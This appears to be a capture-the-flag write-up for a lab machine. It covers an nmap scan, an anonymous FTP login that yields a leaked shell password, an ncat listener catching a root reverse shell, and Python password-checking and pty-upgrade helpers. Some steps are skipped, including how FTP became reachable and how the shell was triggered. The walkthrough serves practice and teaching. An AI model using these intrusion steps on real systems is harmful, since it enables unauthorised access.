```
# Nmap 7.91 scan initiated Mon Jul 26 11:24:16 2021 as: nmap -sSVC -p- -oA nmap_full -v -T 4 10.10.39.43
Nmap scan report for 10.10.39.43
Host is up (0.031s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   filtered ftp
22/tcp   open     ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
2375/tcp filtered docker
4420/tcp open     nvm-express?
| fingerprint-strings:
|   DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|     Please enter password:
|     Invalid password...
|     Connection Closed
|   NULL, RPCCheck:
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|_    Please enter password:
8080/tcp open     http         Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
```
Nmap could not fingerprint the service on port 4420 (its best guess is `nvm-express?`), but the probe responses show a custom, password-protected "internal shell service". Let's connect to it and look at the banner.
```
$ telnet catpictures.thm 4420
Trying 10.10.39.43...
Connected to 10.10.39.43.
Escape character is '^]'.
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password: password
Invalid password...
Connection Closed
Connection closed by foreign host.
```
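Because Nmap's probes did not recognise the service, the banner and the prompt are the only protocol description we have. The client below talks to that prompt the way the telnet session does (wait for `Please enter password: `, send one line, check for `Invalid password...`), so a password found later can be checked without fighting a dumb telnet session. This is an added example and not code from the write-up; the mock server it ships with is constructed so the client runs offline, and its `Password accepted` reply is an assumption, since the page never shows what the real service prints after a correct password.

```python
import socket
import threading

# Banner and rejection text exactly as the telnet session above shows them
# arriving from port 4420; the newline framing is an assumption.
BANNER = (
    b"INTERNAL SHELL SERVICE\n"
    b"please note: cd commands do not work at the moment, the developers are fixing it at the moment.\n"
    b"do not use ctrl-c\n"
    b"Please enter password: "
)
PROMPT = b"Please enter password: "
REJECT = b"Invalid password...\nConnection Closed\n"


def recv_until(sock, marker, limit=65536):
    """Read from sock until marker appears, the peer closes, or a timeout fires."""
    buf = b""
    while marker not in buf and len(buf) < limit:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf


def try_password(host, port, password, timeout=5.0):
    """Connect, wait for the password prompt and answer it once.

    Returns (accepted, banner_text). accepted is False when the service
    answers with the 'Invalid password...' line seen in the write-up."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = recv_until(s, PROMPT)
        if PROMPT not in banner:
            raise RuntimeError("no password prompt; service said: %r" % banner)
        s.sendall(password.encode() + b"\n")
        reply = recv_until(s, b"\n")          # first line of the answer
        accepted = b"Invalid password" not in reply
        return accepted, banner.decode(errors="replace")


def start_mock_service(password, host="127.0.0.1"):
    """Constructed stand-in for the target so the client can be exercised offline.

    It replays the real banner and rejection text. What the real service
    prints after a correct password is not on the page, so the
    'Password accepted' line is an assumption. Returns the bound port."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))                      # port 0: let the OS pick a free port
    srv.listen(5)

    def handle(conn):
        with conn:
            conn.sendall(BANNER)
            line = recv_until(conn, b"\n").rstrip(b"\r\n")
            if line == password.encode():
                conn.sendall(b"Password accepted\n")   # assumption, see docstring
            else:
                conn.sendall(REJECT)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = start_mock_service("correct-horse")       # constructed password for the mock
    for guess in ("password", "correct-horse"):
        ok, banner = try_password("127.0.0.1", port, guess)
        print(banner.splitlines()[0], "->", guess, "accepted" if ok else "rejected")
```

Against the real box the call is `try_password("catpictures.thm", 4420, "<password from the note>")`; the service drops the connection after one wrong answer, so every attempt is a fresh TCP session, which is why `try_password` reconnects each time instead of keeping one socket open.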
Right now we don't have credentials, so let's try the web service instead.
FTP, which showed as filtered in the initial scan, now answers, and anonymous login is allowed; there is a single file in the listing:

```
$ ftp catpictures.thm
Connected to catpictures.thm.
220 (vsFTPd 3.0.3)
Name (catpictures.thm:noraj): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 3,2e-05 seconds (4,83 Mbytes/s)
ftp> quit
221 Goodbye.
```
```
$ cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is s<edited>t.
- catlover
```
A listener on port 9001 catches the connection back from the target:

```
$ ncat -lvnp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.39.43.
Ncat: Connection from 10.10.39.43:38828.
bash: cannot set terminal process group (1609): Inappropriate ioctl for device
bash: no job control in this shell
I have no name!@cat-pictures:/# echo $SHELL
echo $SHELL
/bin/sh
I have no name!@cat-pictures:/# echo $TERM
echo $TERM
dumb
```

The prompt reads `I have no name!` because bash finds no passwd entry for the UID it is running as (the `#` suggests UID 0, but `id` is the thing to check). The two `bash:` warnings and `TERM=dumb` mean this bash has no pseudo-terminal: every command is echoed back, there is no job control, and a Ctrl-C here would kill the ncat listener rather than the remote process.
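The standard fix for a shell like this is to give it a pty on the target, `python3 -c 'import pty; pty.spawn("/bin/bash")'`, then on the attacker side press Ctrl-Z, run `stty raw -echo; fg`, and finally `export TERM=xterm` in the remote shell. The added example below is not from the write-up: `run_in_pty` shows why the upgrade works by running a command under a fresh pseudo-terminal and checking what the child sees, and `upgrade_shell` is the one-liner wrapped as a function. The command strings are constructed for the demonstration.

```python
import os
import pty
import select
import subprocess

# Constructed probe: a POSIX shell reports whether its stdin is a terminal.
TTY_PROBE = ["sh", "-c", "if [ -t 0 ]; then echo has-tty; else echo no-tty; fi"]


def run_in_pty(argv, timeout=10.0):
    """Run argv with a new pseudo-terminal as its controlling tty and return its output.

    This is the mechanism behind pty.spawn(): the child is a session leader on
    the pty slave, so it gets job control, line editing and signal delivery
    that a bare reverse shell on a socket never has."""
    pid, master = pty.fork()
    if pid == 0:                      # child: stdin/stdout/stderr are the pty slave
        os.execvp(argv[0], argv)
        os._exit(127)                 # only reached if exec fails
    out = b""
    while True:
        ready, _, _ = select.select([master], [], [], timeout)
        if not ready:                 # child produced nothing for `timeout` seconds
            break
        try:
            chunk = os.read(master, 4096)
        except OSError:               # EIO on Linux once the child closed the slave
            break
        if not chunk:
            break
        out += chunk
    os.close(master)
    os.waitpid(pid, 0)
    return out.decode(errors="replace")


def child_sees_tty():
    """True when a shell started through run_in_pty believes stdin is a terminal."""
    return "has-tty" in run_in_pty(TTY_PROBE)


def child_sees_tty_plain():
    """Same probe with stdin on a pipe, the situation of the dumb reverse shell above."""
    out = subprocess.run(TTY_PROBE, stdin=subprocess.DEVNULL,
                         capture_output=True, text=True).stdout
    return "has-tty" in out


def upgrade_shell(shell="/bin/bash"):
    """What you run on the target from the dumb shell: hand the current
    stdin/stdout to a shell under a pty. Equivalent to
    python3 -c 'import pty; pty.spawn("/bin/bash")'."""
    os.environ.setdefault("TERM", "xterm")
    pty.spawn(shell)


if __name__ == "__main__":
    print("with pty:   ", "has-tty" if child_sees_tty() else "no-tty")
    print("without pty:", "has-tty" if child_sees_tty_plain() else "no-tty")
```

The `stty raw -echo; fg` step on the attacker side matters as much as the pty: without it the local terminal still intercepts Ctrl-C and echoes keystrokes, so you get double echo and still kill the listener on an interrupt.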